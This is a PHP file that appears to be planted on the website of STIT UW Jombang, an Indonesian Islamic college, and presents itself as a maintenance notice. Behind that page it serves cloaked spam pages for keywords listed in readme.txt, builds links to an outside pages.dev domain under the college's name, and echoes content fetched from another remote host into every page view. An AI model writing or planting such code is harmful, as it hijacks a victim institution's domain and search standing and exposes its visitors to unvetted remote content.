<?php
$path = trim(parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH), '/');
$slug = isset($_GET['ez']) ? (string)$_GET['ez'] : '';

$is_tunnel = false;
$BRANDS = '';
$aduh = $slug;

if ($slug !== '') {
    $filename = "readme.txt";
    if (file_exists($filename)) {
        $lines = file($filename, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
        $target_string = strtolower($slug);
        foreach ($lines as $item) {
            if (strtolower($item) === $target_string) {
                $BRANDS = strtoupper($target_string);
                $is_tunnel = true;
                break;
            }
        }
    }
}

$aduh_cleaned = str_replace(' ', '-', $aduh);
$aduh_cleaned = str_replace('+', '-', $aduh_cleaned);

$amp = 'https://log-error-gr.pages.dev/fai.stituwjombang/' . strtolower($aduh_cleaned);
$nical = "https://{$_SERVER['HTTP_HOST']}{$_SERVER['REQUEST_URI']}";

$keywords = file('readme.txt', FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);

if ($is_tunnel) {
    include 'konten.php';
    exit;
}
?>
<!DOCTYPE html>
<html lang="id">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>STIT UW Jombang: Fakultas Agama Islam</title>
    <meta name="description" content="PROGRAM STUDI 路 Pendidikan Agama Islam (S1) 路 Hukum Ekonomi Syariah (S1) 路 Ilmu Al-Qur'an dan Tafsir (S1) 路 Magister Pendidikan Agama Islam (S2)." />
    <style>
        body {
            margin: 0;
            padding: 0;
            font-family: Arial, sans-serif;
            background: #f2f2f2;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            color: #333;
        }
        .container {
            text-align: center;
            padding: 40px;
            background: #fff;
            border-radius: 10px;
            box-shadow: 0 0 15px rgba(0,0,0,0.2);
        }
        h1 {
            font-size: 48px;
            margin-bottom: 20px;
            color: #ff6600;
        }
        p {
            font-size: 20px;
            margin-bottom: 30px;
        }
        .spinner {
            width: 50px;
            height: 50px;
            border: 6px solid #f3f3f3;
            border-top: 6px solid #ff6600;
            border-radius: 50%;
            animation: spin 1s linear infinite;
            margin: 0 auto;
        }
        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }
    </style>
</head>
<body>
    <div class="container">
        <h1>Maintenance</h1>
        <p>Situs kami sedang dalam perbaikan. Mohon cek kembali nanti!</p>
        <div class="spinner"></div>
    </div>
        <?php echo file_get_contents("https://punten-neng.pages.dev/punten.txt");?>
</body>
</html>
